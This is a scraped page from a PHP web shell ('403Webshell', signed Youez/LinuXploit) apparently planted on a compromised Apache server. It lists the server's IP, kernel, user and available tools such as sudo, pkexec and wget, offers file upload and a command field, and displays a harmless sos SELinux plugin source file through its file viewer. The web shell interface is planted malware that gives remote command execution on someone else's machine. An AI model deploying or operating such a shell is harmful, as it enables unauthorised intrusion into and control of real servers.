403Webshell
Server IP : 182.53.201.61  /  Your IP : 216.73.217.175
Web Server : Apache/2.2.15 (Fedora)
System : Linux km10.dyndns.org 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/python2.6/site-packages/sos/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib/python2.6/site-packages/sos/plugins/selinux.py
### This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.

## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
## GNU General Public License for more details.

## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.

import sos.plugintools
import commands

class selinux(sos.plugintools.PluginBase):
    """selinux related information
    """
    def setup(self):
        # sestatus is always collected in checkenabled()
        self.addCopySpec("/etc/selinux")
        self.collectExtOutput("/usr/bin/selinuxconfig")
        self.eta_weight += 120 # this plugins takes 120x longer (for ETA)
        self.collectExtOutput("/sbin/fixfiles check")

        self.addForbiddenPath("/etc/selinux/targeted")

        return

    def checkenabled(self):
        # is selinux enabled ?
        try:
           if self.collectOutputNow("/usr/sbin/sestatus", root_symlink = "sestatus").split(":")[1].strip() == "disabled":
              return False
        except:
           pass
        return True
    
    def analyze(self):
        # Check for SELinux denials and capture raw output from sealert
        if self.policy().runlevelDefault() in self.policy().runlevelByService("setroubleshoot"):
            # TODO: fixup regex for more precise matching
            sealert=doRegexFindAll(r"^.*setroubleshoot:.*(sealert\s-l\s.*)","/var/log/messages")
            if sealert:
                for i in sealert:
                    self.collectExtOutput("%s" % i)
                self.addAlert("There are numerous selinux errors present and "+
                              "possible fixes stated in the sealert output.")

Youez - 2016 - github.com/yon3zu
LinuXploit